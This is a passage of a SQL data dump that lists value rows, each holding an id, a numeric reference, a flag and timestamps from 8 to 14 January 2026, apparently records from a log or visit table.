11:08:20'),(101348,479,1,'2026-01-08','2026-01-08 11:12:34'),(101349,3706,1,'2026-01-08','2026-01-08 11:18:18'),(101350,3180,1,'2026-01-08','2026-01-08 11:33:44'),(101351,5639,1,'2026-01-08','2026-01-08 12:03:02'),(101352,2904,1,'2026-01-08','2026-01-08 12:04:05'),(101353,2904,1,'2026-01-08','2026-01-08 12:05:04'),(101354,74,1,'2026-01-08','2026-01-08 12:05:27'),(101355,5692,1,'2026-01-08','2026-01-08 12:14:04'),(101356,4408,1,'2026-01-08','2026-01-08 12:38:53'),(101357,4668,1,'2026-01-08','2026-01-08 13:24:36'),(101358,5253,1,'2026-01-08','2026-01-08 13:33:47'),(101359,1718,1,'2026-01-08','2026-01-08 14:14:32'),(101360,4960,1,'2026-01-08','2026-01-08 14:45:01'),(101361,5570,1,'2026-01-08','2026-01-08 14:49:07'),(101362,4977,1,'2026-01-08','2026-01-08 14:52:12'),(101363,1872,1,'2026-01-08','2026-01-08 15:31:50'),(101364,4802,1,'2026-01-08','2026-01-08 16:10:30'),(101365,91,1,'2026-01-08','2026-01-08 16:26:11'),(101366,4741,1,'2026-01-08','2026-01-08 16:43:27'),(101367,4529,1,'2026-01-08','2026-01-08 16:43:27'),(101368,2558,1,'2026-01-08','2026-01-08 17:04:28'),(101369,4950,1,'2026-01-08','2026-01-08 17:07:45'),(101370,4404,1,'2026-01-08','2026-01-08 17:11:26'),(101371,4950,1,'2026-01-08','2026-01-08 17:35:47'),(101372,4950,1,'2026-01-08','2026-01-08 17:36:56'),(101373,72,1,'2026-01-08','2026-01-08 17:39:25'),(101374,5464,1,'2026-01-08','2026-01-08 17:39:27'),(101375,5425,1,'2026-01-08','2026-01-08 17:48:44'),(101376,468,1,'2026-01-08','2026-01-08 18:13:49'),(101377,3038,1,'2026-01-08','2026-01-08 18:29:18'),(101378,5080,1,'2026-01-08','2026-01-08 18:50:25'),(101379,5696,1,'2026-01-08','2026-01-08 19:03:39'),(101380,5449,1,'2026-01-08','2026-01-08 19:09:06'),(101381,5406,1,'2026-01-08','2026-01-08 20:23:22'),(101382,3307,1,'2026-01-08','2026-01-08 20:30:38'),(101383,4966,1,'2026-01-08','2026-01-08 20:35:00'),(101384,5692,1,'2026-01-08','2026-01-08 21:25:08'),(101385,4944,1,'2026-01-08','2026-01-08 21:30:53'),(101386,1718,1,'2026-01-08','2026-01-08 22:08:16'),(101387,5489,1,'2026-01-08','2026-01-08 22:32:02'),(101388,5397,1,'2026-01-08','2026-01-08 22:42:48'),(101389,4950,1,'2026-01-08','2026-01-08 23:03:27'),(101390,5464,1,'2026-01-08','2026-01-08 23:13:39'),(101391,5397,1,'2026-01-08','2026-01-08 23:35:49'),(101392,5512,1,'2026-01-09','2026-01-09 00:20:30'),(101393,5406,1,'2026-01-09','2026-01-09 00:58:54'),(101394,5461,1,'2026-01-09','2026-01-09 01:12:09'),(101395,469,1,'2026-01-09','2026-01-09 01:30:32'),(101396,3117,1,'2026-01-09','2026-01-09 01:39:35'),(101397,5131,1,'2026-01-09','2026-01-09 02:14:10'),(101398,1728,1,'2026-01-09','2026-01-09 02:37:33'),(101399,68,1,'2026-01-09','2026-01-09 02:48:34'),(101400,5301,1,'2026-01-09','2026-01-09 02:59:29'),(101401,5492,1,'2026-01-09','2026-01-09 03:00:40'),(101402,5428,1,'2026-01-09','2026-01-09 03:28:06'),(101403,5409,1,'2026-01-09','2026-01-09 04:00:29'),(101404,5512,1,'2026-01-09','2026-01-09 04:12:38'),(101405,2410,1,'2026-01-09','2026-01-09 04:43:53'),(101406,5067,1,'2026-01-09','2026-01-09 05:38:48'),(101407,110,1,'2026-01-09','2026-01-09 05:48:15'),(101408,1703,1,'2026-01-09','2026-01-09 05:58:47'),(101409,4368,1,'2026-01-09','2026-01-09 05:59:06'),(101410,4681,1,'2026-01-09','2026-01-09 06:19:34'),(101411,91,1,'2026-01-09','2026-01-09 07:18:41'),(101412,1582,1,'2026-01-09','2026-01-09 07:59:44'),(101413,5570,1,'2026-01-09','2026-01-09 08:00:25'),(101414,4357,1,'2026-01-09','2026-01-09 08:00:42'),(101415,5264,1,'2026-01-09','2026-01-09 08:31:00'),(101416,4750,1,'2026-01-09','2026-01-09 09:02:17'),(101417,1582,1,'2026-01-09','2026-01-09 09:31:58'),(101418,5454,1,'2026-01-09','2026-01-09 09:51:17'),(101419,4950,1,'2026-01-09','2026-01-09 10:31:45'),(101420,76,1,'2026-01-09','2026-01-09 10:34:58'),(101421,5406,1,'2026-01-09','2026-01-09 12:09:26'),(101422,5472,1,'2026-01-09','2026-01-09 12:14:33'),(101423,4635,1,'2026-01-09','2026-01-09 12:42:32'),(101424,5400,1,'2026-01-09','2026-01-09 12:50:35'),(101425,1722,1,'2026-01-09','2026-01-09 13:13:14'),(101426,1582,1,'2026-01-09','2026-01-09 13:21:25'),(101427,5397,1,'2026-01-09','2026-01-09 13:51:57'),(101428,3226,1,'2026-01-09','2026-01-09 14:00:05'),(101429,2457,1,'2026-01-09','2026-01-09 14:11:32'),(101430,1582,1,'2026-01-09','2026-01-09 14:23:16'),(101431,3714,1,'2026-01-09','2026-01-09 15:39:40'),(101432,5578,1,'2026-01-09','2026-01-09 16:10:01'),(101433,5567,1,'2026-01-09','2026-01-09 16:13:50'),(101434,5692,1,'2026-01-09','2026-01-09 16:30:50'),(101435,5436,1,'2026-01-09','2026-01-09 16:33:08'),(101436,72,1,'2026-01-09','2026-01-09 16:59:32'),(101437,5420,1,'2026-01-09','2026-01-09 17:06:33'),(101438,1614,1,'2026-01-09','2026-01-09 17:28:05'),(101439,80,1,'2026-01-09','2026-01-09 17:29:03'),(101440,80,1,'2026-01-09','2026-01-09 17:36:12'),(101441,4420,1,'2026-01-09','2026-01-09 19:46:39'),(101442,5692,1,'2026-01-09','2026-01-09 19:55:58'),(101443,3486,1,'2026-01-09','2026-01-09 20:02:09'),(101444,5397,1,'2026-01-09','2026-01-09 20:19:35'),(101445,5441,1,'2026-01-09','2026-01-09 21:55:03'),(101446,110,1,'2026-01-09','2026-01-09 22:06:34'),(101447,5464,1,'2026-01-09','2026-01-09 22:35:22'),(101448,4712,1,'2026-01-09','2026-01-09 22:44:33'),(101449,5512,1,'2026-01-09','2026-01-09 22:52:33'),(101450,2161,1,'2026-01-09','2026-01-09 23:25:40'),(101451,4566,1,'2026-01-09','2026-01-09 23:34:45'),(101452,4950,1,'2026-01-09','2026-01-09 23:58:12'),(101453,5570,1,'2026-01-10','2026-01-10 00:04:31'),(101454,5692,1,'2026-01-10','2026-01-10 00:20:01'),(101455,5454,1,'2026-01-10','2026-01-10 00:53:13'),(101456,1582,1,'2026-01-10','2026-01-10 00:55:58'),(101457,4412,1,'2026-01-10','2026-01-10 01:22:29'),(101458,5400,1,'2026-01-10','2026-01-10 01:24:04'),(101459,4529,1,'2026-01-10','2026-01-10 01:24:05'),(101460,5425,1,'2026-01-10','2026-01-10 01:26:48'),(101461,5578,1,'2026-01-10','2026-01-10 01:30:56'),(101462,5412,1,'2026-01-10','2026-01-10 01:39:01'),(101463,5406,1,'2026-01-10','2026-01-10 01:44:02'),(101464,5409,1,'2026-01-10','2026-01-10 01:50:07'),(101465,5125,1,'2026-01-10','2026-01-10 01:51:07'),(101466,5561,1,'2026-01-10','2026-01-10 01:51:07'),(101467,5248,1,'2026-01-10','2026-01-10 01:51:54'),(101468,3045,1,'2026-01-10','2026-01-10 01:58:13'),(101469,5449,1,'2026-01-10','2026-01-10 02:09:34'),(101470,4983,1,'2026-01-10','2026-01-10 02:20:01'),(101471,5461,1,'2026-01-10','2026-01-10 02:25:48'),(101472,3486,1,'2026-01-10','2026-01-10 02:25:49'),(101473,5492,1,'2026-01-10','2026-01-10 02:29:48'),(101474,110,1,'2026-01-10','2026-01-10 02:34:51'),(101475,5464,1,'2026-01-10','2026-01-10 02:36:59'),(101476,4712,1,'2026-01-10','2026-01-10 02:38:00'),(101477,5593,1,'2026-01-10','2026-01-10 03:37:56'),(101478,84,1,'2026-01-10','2026-01-10 04:01:45'),(101479,468,1,'2026-01-10','2026-01-10 05:05:19'),(101480,91,1,'2026-01-10','2026-01-10 05:07:38'),(101481,2609,1,'2026-01-10','2026-01-10 05:09:01'),(101482,5037,1,'2026-01-10','2026-01-10 05:09:58'),(101483,5515,1,'2026-01-10','2026-01-10 05:10:21'),(101484,5618,1,'2026-01-10','2026-01-10 06:53:27'),(101485,5467,1,'2026-01-10','2026-01-10 07:09:11'),(101486,91,1,'2026-01-10','2026-01-10 07:24:06'),(101487,2148,1,'2026-01-10','2026-01-10 07:32:03'),(101488,470,1,'2026-01-10','2026-01-10 09:17:46'),(101489,3282,1,'2026-01-10','2026-01-10 09:24:51'),(101490,5692,1,'2026-01-10','2026-01-10 12:55:43'),(101491,2813,1,'2026-01-10','2026-01-10 13:22:26'),(101492,3251,1,'2026-01-10','2026-01-10 13:32:23'),(101493,4950,1,'2026-01-10','2026-01-10 14:07:55'),(101494,5428,1,'2026-01-10','2026-01-10 14:16:36'),(101495,4950,1,'2026-01-10','2026-01-10 14:36:00'),(101496,4950,1,'2026-01-10','2026-01-10 14:42:28'),(101497,4950,1,'2026-01-10','2026-01-10 16:18:18'),(101498,80,1,'2026-01-10','2026-01-10 16:19:35'),(101499,4966,1,'2026-01-10','2026-01-10 17:05:59'),(101500,2161,1,'2026-01-10','2026-01-10 17:33:31'),(101501,5502,1,'2026-01-10','2026-01-10 17:54:05'),(101502,3307,1,'2026-01-10','2026-01-10 17:59:10'),(101503,3069,1,'2026-01-10','2026-01-10 18:51:48'),(101504,3267,1,'2026-01-10','2026-01-10 19:01:18'),(101505,5515,1,'2026-01-10','2026-01-10 19:04:55'),(101506,5433,1,'2026-01-10','2026-01-10 19:14:11'),(101507,3752,1,'2026-01-10','2026-01-10 19:28:22'),(101508,470,1,'2026-01-10','2026-01-10 20:04:14'),(101509,5461,1,'2026-01-10','2026-01-10 20:20:47'),(101510,5363,1,'2026-01-10','2026-01-10 20:25:34'),(101511,3083,1,'2026-01-10','2026-01-10 20:27:48'),(101512,5457,1,'2026-01-10','2026-01-10 20:51:07'),(101513,5674,1,'2026-01-10','2026-01-10 20:59:04'),(101514,4660,1,'2026-01-10','2026-01-10 21:06:25'),(101515,91,1,'2026-01-10','2026-01-10 22:15:07'),(101516,5397,1,'2026-01-10','2026-01-10 22:33:07'),(101517,5289,1,'2026-01-10','2026-01-10 23:02:24'),(101518,1582,1,'2026-01-11','2026-01-11 00:20:53'),(101519,4520,1,'2026-01-11','2026-01-11 01:26:27'),(101520,4950,1,'2026-01-11','2026-01-11 02:03:53'),(101521,4400,1,'2026-01-11','2026-01-11 02:16:57'),(101522,5289,1,'2026-01-11','2026-01-11 02:17:54'),(101523,5674,1,'2026-01-11','2026-01-11 02:41:29'),(101524,5433,1,'2026-01-11','2026-01-11 02:57:19'),(101525,3664,1,'2026-01-11','2026-01-11 03:17:27'),(101526,4911,1,'2026-01-11','2026-01-11 03:18:15'),(101527,4344,1,'2026-01-11','2026-01-11 03:34:10'),(101528,5489,1,'2026-01-11','2026-01-11 03:49:59'),(101529,4722,1,'2026-01-11','2026-01-11 04:12:26'),(101530,5626,1,'2026-01-11','2026-01-11 04:32:49'),(101531,5626,1,'2026-01-11','2026-01-11 04:48:05'),(101532,5626,1,'2026-01-11','2026-01-11 04:54:54'),(101533,4950,1,'2026-01-11','2026-01-11 05:00:36'),(101534,5454,1,'2026-01-11','2026-01-11 06:00:46'),(101535,3781,1,'2026-01-11','2026-01-11 06:28:52'),(101536,3117,1,'2026-01-11','2026-01-11 06:54:08'),(101537,91,1,'2026-01-11','2026-01-11 07:26:19'),(101538,2904,1,'2026-01-11','2026-01-11 07:36:41'),(101539,3097,1,'2026-01-11','2026-01-11 07:43:24'),(101540,5614,1,'2026-01-11','2026-01-11 08:01:23'),(101541,5050,1,'2026-01-11','2026-01-11 08:33:34'),(101542,5428,1,'2026-01-11','2026-01-11 08:49:36'),(101543,3038,1,'2026-01-11','2026-01-11 09:14:04'),(101544,5024,1,'2026-01-11','2026-01-11 09:34:51'),(101545,5441,1,'2026-01-11','2026-01-11 09:57:32'),(101546,2658,1,'2026-01-11','2026-01-11 10:08:06'),(101547,4612,1,'2026-01-11','2026-01-11 10:17:43'),(101548,4432,1,'2026-01-11','2026-01-11 11:03:57'),(101549,3083,1,'2026-01-11','2026-01-11 11:36:44'),(101550,5567,1,'2026-01-11','2026-01-11 12:01:32'),(101551,3704,1,'2026-01-11','2026-01-11 12:13:05'),(101552,1602,1,'2026-01-11','2026-01-11 12:21:34'),(101553,467,1,'2026-01-11','2026-01-11 13:21:44'),(101554,4963,1,'2026-01-11','2026-01-11 14:06:35'),(101555,68,1,'2026-01-11','2026-01-11 15:04:24'),(101556,468,1,'2026-01-11','2026-01-11 15:08:04'),(101557,4977,1,'2026-01-11','2026-01-11 15:46:31'),(101558,4944,1,'2026-01-11','2026-01-11 16:23:34'),(101559,5409,1,'2026-01-11','2026-01-11 16:32:04'),(101560,5441,1,'2026-01-11','2026-01-11 17:08:22'),(101561,5276,1,'2026-01-11','2026-01-11 17:45:51'),(101562,5128,1,'2026-01-11','2026-01-11 18:30:47'),(101563,5502,1,'2026-01-11','2026-01-11 18:34:43'),(101564,5502,1,'2026-01-11','2026-01-11 18:45:31'),(101565,3307,1,'2026-01-11','2026-01-11 18:48:52'),(101566,3781,1,'2026-01-11','2026-01-11 18:58:41'),(101567,3102,1,'2026-01-11','2026-01-11 19:04:35'),(101568,1749,1,'2026-01-11','2026-01-11 19:57:59'),(101569,5397,1,'2026-01-11','2026-01-11 20:01:40'),(101570,5449,1,'2026-01-11','2026-01-11 20:07:57'),(101571,5649,1,'2026-01-11','2026-01-11 20:14:15'),(101572,5515,1,'2026-01-11','2026-01-11 20:24:55'),(101573,4747,1,'2026-01-11','2026-01-11 20:49:36'),(101574,5433,1,'2026-01-11','2026-01-11 20:52:16'),(101575,1614,1,'2026-01-11','2026-01-11 21:18:50'),(101576,76,1,'2026-01-11','2026-01-11 21:40:16'),(101577,76,1,'2026-01-11','2026-01-11 21:55:09'),(101578,487,1,'2026-01-11','2026-01-11 21:56:36'),(101579,76,1,'2026-01-11','2026-01-11 21:56:44'),(101580,470,1,'2026-01-11','2026-01-11 21:57:01'),(101581,468,1,'2026-01-11','2026-01-11 21:57:40'),(101582,5557,1,'2026-01-11','2026-01-11 21:59:34'),(101583,468,1,'2026-01-11','2026-01-11 21:59:37'),(101584,5080,1,'2026-01-11','2026-01-11 22:01:39'),(101585,5464,1,'2026-01-11','2026-01-11 22:01:44'),(101586,1588,1,'2026-01-11','2026-01-11 22:14:26'),(101587,3691,1,'2026-01-11','2026-01-11 22:17:32'),(101588,3045,1,'2026-01-11','2026-01-11 22:27:28'),(101589,5512,1,'2026-01-11','2026-01-11 23:03:49'),(101590,5457,1,'2026-01-11','2026-01-11 23:05:50'),(101591,1614,1,'2026-01-11','2026-01-11 23:58:43'),(101592,2154,1,'2026-01-12','2026-01-12 00:07:25'),(101593,4660,1,'2026-01-12','2026-01-12 00:07:27'),(101594,2993,1,'2026-01-12','2026-01-12 00:19:47'),(101595,4660,1,'2026-01-12','2026-01-12 00:30:53'),(101596,4893,1,'2026-01-12','2026-01-12 00:35:17'),(101597,1582,1,'2026-01-12','2026-01-12 00:36:08'),(101598,3027,1,'2026-01-12','2026-01-12 00:39:30'),(101599,476,1,'2026-01-12','2026-01-12 00:42:27'),(101600,4444,1,'2026-01-12','2026-01-12 00:47:27'),(101601,4878,1,'2026-01-12','2026-01-12 00:51:36'),(101602,5397,1,'2026-01-12','2026-01-12 01:34:48'),(101603,80,1,'2026-01-12','2026-01-12 01:42:18'),(101604,68,1,'2026-01-12','2026-01-12 01:48:25'),(101605,84,1,'2026-01-12','2026-01-12 02:05:17'),(101606,3117,1,'2026-01-12','2026-01-12 02:11:40'),(101607,5454,1,'2026-01-12','2026-01-12 02:13:51'),(101608,3541,1,'2026-01-12','2026-01-12 02:26:23'),(101609,4897,1,'2026-01-12','2026-01-12 02:48:03'),(101610,5289,1,'2026-01-12','2026-01-12 02:48:06'),(101611,102,1,'2026-01-12','2026-01-12 02:53:17'),(101612,5001,1,'2026-01-12','2026-01-12 03:05:46'),(101613,1726,1,'2026-01-12','2026-01-12 03:18:05'),(101614,4674,1,'2026-01-12','2026-01-12 03:23:00'),(101615,2956,1,'2026-01-12','2026-01-12 03:26:48'),(101616,3181,1,'2026-01-12','2026-01-12 03:46:33'),(101617,3788,1,'2026-01-12','2026-01-12 04:20:05'),(101618,5585,1,'2026-01-12','2026-01-12 04:50:53'),(101619,4960,1,'2026-01-12','2026-01-12 05:01:55'),(101620,4608,1,'2026-01-12','2026-01-12 05:06:29'),(101621,5062,1,'2026-01-12','2026-01-12 05:22:37'),(101622,5425,1,'2026-01-12','2026-01-12 05:23:20'),(101623,5578,1,'2026-01-12','2026-01-12 05:43:04'),(101624,3297,1,'2026-01-12','2026-01-12 06:01:34'),(101625,4432,1,'2026-01-12','2026-01-12 06:07:59'),(101626,3705,1,'2026-01-12','2026-01-12 06:18:22'),(101627,5578,1,'2026-01-12','2026-01-12 07:10:34'),(101628,4750,1,'2026-01-12','2026-01-12 07:15:07'),(101629,467,1,'2026-01-12','2026-01-12 07:28:11'),(101630,2297,1,'2026-01-12','2026-01-12 07:31:47'),(101631,91,1,'2026-01-12','2026-01-12 07:45:36'),(101632,4400,1,'2026-01-12','2026-01-12 07:57:04'),(101633,4391,1,'2026-01-12','2026-01-12 08:01:26'),(101634,5412,1,'2026-01-12','2026-01-12 08:19:16'),(101635,1745,1,'2026-01-12','2026-01-12 08:28:41'),(101636,4712,1,'2026-01-12','2026-01-12 08:51:35'),(101637,2904,1,'2026-01-12','2026-01-12 08:52:52'),(101638,5406,1,'2026-01-12','2026-01-12 08:54:34'),(101639,5409,1,'2026-01-12','2026-01-12 08:54:35'),(101640,3038,1,'2026-01-12','2026-01-12 08:54:35'),(101641,4529,1,'2026-01-12','2026-01-12 08:55:27'),(101642,3027,1,'2026-01-12','2026-01-12 08:55:29'),(101643,5067,1,'2026-01-12','2026-01-12 08:55:30'),(101644,4529,1,'2026-01-12','2026-01-12 08:58:37'),(101645,5512,1,'2026-01-12','2026-01-12 09:02:26'),(101646,3307,1,'2026-01-12','2026-01-12 09:02:27'),(101647,5549,1,'2026-01-12','2026-01-12 09:08:07'),(101648,3698,1,'2026-01-12','2026-01-12 09:35:25'),(101649,1715,1,'2026-01-12','2026-01-12 10:29:01'),(101650,89,1,'2026-01-12','2026-01-12 11:20:00'),(101651,4722,1,'2026-01-12','2026-01-12 11:22:15'),(101652,1604,1,'2026-01-12','2026-01-12 12:48:48'),(101653,3087,1,'2026-01-12','2026-01-12 13:11:53'),(101654,3004,1,'2026-01-12','2026-01-12 14:05:47'),(101655,3045,1,'2026-01-12','2026-01-12 14:31:49'),(101656,5692,1,'2026-01-12','2026-01-12 14:56:39'),(101657,3117,1,'2026-01-12','2026-01-12 15:18:57'),(101658,5259,1,'2026-01-12','2026-01-12 15:48:18'),(101659,2904,1,'2026-01-12','2026-01-12 15:55:20'),(101660,5428,1,'2026-01-12','2026-01-12 16:26:59'),(101661,5163,1,'2026-01-12','2026-01-12 16:33:06'),(101662,5522,1,'2026-01-12','2026-01-12 16:38:06'),(101663,3038,1,'2026-01-12','2026-01-12 16:41:13'),(101664,5409,1,'2026-01-12','2026-01-12 16:48:14'),(101665,5441,1,'2026-01-12','2026-01-12 16:57:20'),(101666,3781,1,'2026-01-12','2026-01-12 19:53:16'),(101667,3069,1,'2026-01-12','2026-01-12 20:06:20'),(101668,1588,1,'2026-01-12','2026-01-12 20:11:54'),(101669,4950,1,'2026-01-12','2026-01-12 20:27:09'),(101670,80,1,'2026-01-12','2026-01-12 20:28:19'),(101671,2395,1,'2026-01-12','2026-01-12 20:40:46'),(101672,4966,1,'2026-01-12','2026-01-12 20:51:13'),(101673,3752,1,'2026-01-12','2026-01-12 21:26:31'),(101674,4400,1,'2026-01-12','2026-01-12 21:29:17'),(101675,3275,1,'2026-01-12','2026-01-12 22:26:54'),(101676,4637,1,'2026-01-12','2026-01-12 22:39:15'),(101677,4612,1,'2026-01-12','2026-01-12 23:07:42'),(101678,5433,1,'2026-01-12','2026-01-12 23:41:21'),(101679,4950,1,'2026-01-13','2026-01-13 00:05:30'),(101680,4391,1,'2026-01-13','2026-01-13 00:12:36'),(101681,4569,1,'2026-01-13','2026-01-13 01:09:19'),(101682,1870,1,'2026-01-13','2026-01-13 01:14:13'),(101683,5570,1,'2026-01-13','2026-01-13 01:33:57'),(101684,1612,1,'2026-01-13','2026-01-13 01:46:09'),(101685,5400,1,'2026-01-13','2026-01-13 01:53:02'),(101686,4529,1,'2026-01-13','2026-01-13 01:54:08'),(101687,2993,1,'2026-01-13','2026-01-13 02:05:51'),(101688,80,1,'2026-01-13','2026-01-13 02:06:25'),(101689,2993,1,'2026-01-13','2026-01-13 02:06:54'),(101690,1604,1,'2026-01-13','2026-01-13 02:55:43'),(101691,5489,1,'2026-01-13','2026-01-13 03:05:49'),(101692,5406,1,'2026-01-13','2026-01-13 03:14:00'),(101693,5561,1,'2026-01-13','2026-01-13 03:22:20'),(101694,4762,1,'2026-01-13','2026-01-13 03:23:01'),(101695,5125,1,'2026-01-13','2026-01-13 03:23:18'),(101696,5449,1,'2026-01-13','2026-01-13 03:31:29'),(101697,3045,1,'2026-01-13','2026-01-13 04:06:31'),(101698,87,1,'2026-01-13','2026-01-13 04:14:36'),(101699,91,1,'2026-01-13','2026-01-13 04:17:01'),(101700,5157,1,'2026-01-13','2026-01-13 04:19:32'),(101701,4977,1,'2026-01-13','2026-01-13 04:21:58'),(101702,3034,1,'2026-01-13','2026-01-13 04:23:51'),(101703,5157,1,'2026-01-13','2026-01-13 04:30:29'),(101704,5157,1,'2026-01-13','2026-01-13 04:30:30'),(101705,335,1,'2026-01-13','2026-01-13 04:34:15'),(101706,87,1,'2026-01-13','2026-01-13 04:35:52'),(101707,4930,1,'2026-01-13','2026-01-13 04:36:19'),(101708,4911,1,'2026-01-13','2026-01-13 04:36:34'),(101709,91,1,'2026-01-13','2026-01-13 04:37:08'),(101710,3282,1,'2026-01-13','2026-01-13 04:40:42'),(101711,4587,1,'2026-01-13','2026-01-13 04:42:32'),(101712,4941,1,'2026-01-13','2026-01-13 04:45:30'),(101713,91,1,'2026-01-13','2026-01-13 04:47:42'),(101714,4238,1,'2026-01-13','2026-01-13 04:50:02'),(101715,91,1,'2026-01-13','2026-01-13 05:00:59'),(101716,3269,1,'2026-01-13','2026-01-13 05:01:53'),(101717,5323,1,'2026-01-13','2026-01-13 05:24:39'),(101718,5163,1,'2026-01-13','2026-01-13 06:23:13'),(101719,5409,1,'2026-01-13','2026-01-13 06:36:34'),(101720,1780,1,'2026-01-13','2026-01-13 06:42:34'),(101721,4950,1,'2026-01-13','2026-01-13 07:27:28'),(101722,91,1,'2026-01-13','2026-01-13 07:49:49'),(101723,5449,1,'2026-01-13','2026-01-13 08:05:31'),(101724,72,1,'2026-01-13','2026-01-13 08:33:51'),(101725,4412,1,'2026-01-13','2026-01-13 08:52:27'),(101726,1602,1,'2026-01-13','2026-01-13 09:15:33'),(101727,5163,1,'2026-01-13','2026-01-13 10:39:19'),(101728,2248,1,'2026-01-13','2026-01-13 11:03:24'),(101729,5639,1,'2026-01-13','2026-01-13 11:28:02'),(101730,5495,1,'2026-01-13','2026-01-13 11:29:02'),(101731,1877,1,'2026-01-13','2026-01-13 11:33:02'),(101732,4556,1,'2026-01-13','2026-01-13 11:54:55'),(101733,3030,1,'2026-01-13','2026-01-13 12:01:49'),(101734,5692,1,'2026-01-13','2026-01-13 12:03:29'),(101735,1544,1,'2026-01-13','2026-01-13 12:43:47'),(101736,4983,1,'2026-01-13','2026-01-13 13:32:39'),(101737,5512,1,'2026-01-13','2026-01-13 13:35:30'),(101738,2704,1,'2026-01-13','2026-01-13 13:39:43'),(101739,2775,1,'2026-01-13','2026-01-13 14:11:14'),(101740,5472,1,'2026-01-13','2026-01-13 14:21:42'),(101741,5157,1,'2026-01-13','2026-01-13 15:17:44'),(101742,4963,1,'2026-01-13','2026-01-13 15:26:35'),(101743,4977,1,'2026-01-13','2026-01-13 15:32:50'),(101744,76,1,'2026-01-13','2026-01-13 15:46:57'),(101745,4950,1,'2026-01-13','2026-01-13 16:00:39'),(101746,76,1,'2026-01-13','2026-01-13 16:13:31'),(101747,5461,1,'2026-01-13','2026-01-13 16:15:45'),(101748,76,1,'2026-01-13','2026-01-13 16:15:48'),(101749,3486,1,'2026-01-13','2026-01-13 16:33:45'),(101750,4878,1,'2026-01-13','2026-01-13 16:57:43'),(101751,91,1,'2026-01-13','2026-01-13 17:02:07'),(101752,5674,1,'2026-01-13','2026-01-13 17:02:21'),(101753,5674,1,'2026-01-13','2026-01-13 17:02:23'),(101754,91,1,'2026-01-13','2026-01-13 17:02:48'),(101755,4878,1,'2026-01-13','2026-01-13 17:05:08'),(101756,5567,1,'2026-01-13','2026-01-13 17:16:16'),(101757,4878,1,'2026-01-13','2026-01-13 17:19:58'),(101758,68,1,'2026-01-13','2026-01-13 18:03:32'),(101759,5639,1,'2026-01-13','2026-01-13 18:38:09'),(101760,1594,1,'2026-01-13','2026-01-13 18:50:55'),(101761,3307,1,'2026-01-13','2026-01-13 19:30:18'),(101762,1602,1,'2026-01-13','2026-01-13 20:35:14'),(101763,5125,1,'2026-01-13','2026-01-13 20:36:03'),(101764,3096,1,'2026-01-13','2026-01-13 20:51:55'),(101765,1586,1,'2026-01-13','2026-01-13 21:26:24'),(101766,1582,1,'2026-01-13','2026-01-13 21:27:27'),(101767,1582,1,'2026-01-13','2026-01-13 21:28:34'),(101768,5397,1,'2026-01-13','2026-01-13 22:04:37'),(101769,1582,1,'2026-01-13','2026-01-13 22:18:43'),(101770,3746,1,'2026-01-13','2026-01-13 22:39:18'),(101771,5515,1,'2026-01-13','2026-01-13 22:54:15'),(101772,5433,1,'2026-01-13','2026-01-13 23:27:54'),(101773,3752,1,'2026-01-13','2026-01-13 23:53:50'),(101774,4944,1,'2026-01-13','2026-01-13 23:54:36'),(101775,2704,1,'2026-01-14','2026-01-14 00:04:33'),(101776,3680,1,'2026-01-14','2026-01-14 00:30:58'),(101777,4428,1,'2026-01-14','2026-01-14 01:33:46'),(101778,3229,1,'2026-01-14','2026-01-14 01:36:50'),(101779,5639,1,'2026-01-14','2026-01-14 01:54:26'),(101780,4977,1,'2026-01-14','2026-01-14 02:17:15'),(101781,5593,1,'2026-01-14','2026-01-14 02:35:52'),(101782,4963,1,'2026-01-14','2026-01-14 02:47:43'),(101783,3313,1,'2026-01-14','2026-01-14 02:50:17'),(101784,5457,1,'2026-01-14','2026-01-14 03:36:16'),(101785,5674,1,'2026-01-14','2026-01-14 04:07:36'),(101786,5433,1,'2026-01-14','2026-01-14 05:34:33'),(101787,4983,1,'2026-01-14','2026-01-14 06:32:49'),(101788,91,1,'2026-01-14','2026-01-14 06:53:21'),(101789,474,1,'2026-01-14','2026-01-14 07:45:32'),(101790,3117,1,'2026-01-14','2026-01-14 08:32:02'),(101791,5280,1,'2026-01-14','2026-01-14 09:30:38'),(101792,4983,1,'2026-01-14','2026-01-14 09:33:46'),(101793,4980,1,'2026-01-14','2026-01-14 09:44:37'),(101794,1614,1,'2026-01-14','2026-01-14 10:00:29'),(101795,80,1,'2026-01-14','2026-01-14 10:01:15'),(101796,80,1,'2026-01-14','2026-01-14 10:01:24'),(101797,80,1,'2026-01-14','2026-01-14 10:01:35'),(101798,68,1,'2026-01-14','2026-01-14 10:03:08'),(101799,5649,1,'2026-01-14','2026-01-14 10:16:37'),(101800,1582,1,'2026-01-14','2026-01-14 10:23:39'),(101801,5400,1,'2026-01-14','2026-01-14 10:31:20'),(101802,80,1,'2026-01-14','2026-01-14 10:40:43'),(101803,5412,1,'2026-01-14','2026-01-14 10:46:21'),(101804,4529,1,'2026-01-14','2026-01-14 10:49:28'),(101805,2804,1,'2026-01-14','2026-01-14 11:01:01'),(101806,4712,1,'2026-01-14','2026-01-14 11:51:01'),(101807,480,1,'2026-01-14','2026-01-14 11:58:14'),(101808,1544,1,'2026-01-14','2026-01-14 12:26:33'),(101809,3675,1,'2026-01-14','2026-01-14 12:30:40'),(101810,3789,1,'2026-01-14','2026-01-14 12:45:24'),(101811,5692,1,'2026-01-14','2026-01-14 12:45:36'),(101812,4373,1,'2026-01-14','2026-01-14 12:50:39'),(101813,72,1,'2026-01-14','2026-01-14 12:51:35'),(101814,5578,1,'2026-01-14','2026-01-14 14:34:41'),(101815,5441,1,'2026-01-14','2026-01-14 14:36:02'),(101816,4911,1,'2026-01-14','2026-01-14 15:13:11'),(101817,5588,1,'2026-01-14','2026-01-14 16:28:17'),(101818,5561,1,'2026-01-14','2026-01-14 17:37:03'),(101819,4660,1,'2026-01-14','2026-01-14 17:37:06'),(101820,5502,1,'2026-01-14','2026-01-14 19:14:21'),(101821,1614,1,'2026-01-14','2026-01-14 20:03:43'),(101822,3127,1,'2026-01-14','2026-01-14 20:07:51'),(101823,5397,1,'2026-01-14','2026-01-14 20:22:46'),(101824,4950,1,'2026-01-14','2026-01-14 20:32:45'),(101825,4930,1,'2026-01-14','2026-01-14 20:33:42'),(101826,4950,1,'2026-01-14','2026-01-14 20:34:03'),(101827,74,1,'2026-01-14','2026-01-14 21:24:40'),(101828,68,1,'2026-01-14','2026-01-14 21:38:55'),(101829,5409,1,'2026-01-14','2026-01-14 21:45:48'),(101830,3781,1,'2026-01-14','2026-01-14 21:50:45'),(101831,3069,1,'2026-01-14','2026-01-14 22:33:21'),(101832,5420,1,'2026-01-14','2026-01-14 22:45:20'),(101833,5157,1,'2026-01-14','2026-01-14 